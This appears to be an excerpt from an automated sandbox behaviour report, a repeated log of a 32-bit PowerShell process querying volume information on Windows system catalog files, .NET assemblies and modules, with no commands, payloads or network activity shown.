                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
